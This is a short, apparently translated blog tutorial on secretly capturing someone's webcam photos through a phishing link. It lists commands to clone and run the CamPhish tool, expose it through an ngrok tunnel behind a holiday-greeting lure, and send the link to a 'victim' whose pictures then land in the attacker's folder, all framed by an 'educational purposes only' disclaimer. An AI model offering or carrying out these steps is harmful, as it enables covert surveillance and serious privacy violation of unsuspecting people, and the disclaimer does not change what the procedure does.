Hi everybody
So today I’ll tell you how we can hack someone’s camera just by sending the link, so let’s get started
First of all we need a LINUX based distribution so I’ll use UBUNTU here
We will then update our Linux terminal so that we can do our job with any problems !!!
So just type the following commands:
“sudo su”
By typing this you enter your terminal’s root directory
Then type “apt update”
Then “apt upgrade”
After updating your Linux, simply type the following commands:
Now we will start the real process
1> git clone https://github.com/techchipnet/CamPhish
Then write
2> cd CamPhish
Then write
3> bash camphish.sh
Then choose the ngrok option
Then choose any option like festival
Then write the name of the festival like this: “Happy holidays”
Then press enter and BOOOM !!!!!!!!! you have the connection
Now just send the link to the victim and then you will start receiving pictures of the victim !!!
Images Percentage of victim will be saved to your CamPhish folder
We are done with camera piracy now, SO this post is for educational purposes only, not for illegal purpose !!!!!
MakingDo not attempt to break the law with anything found here. If you have planned to use the content for illegal purposes, please leave this site immediately! We will not be responsible for any of your illegal actions. The administration of this website, the authors of this material, or anyone else connected in any way will not accept responsibility for your actions. Be happy and let others be happy too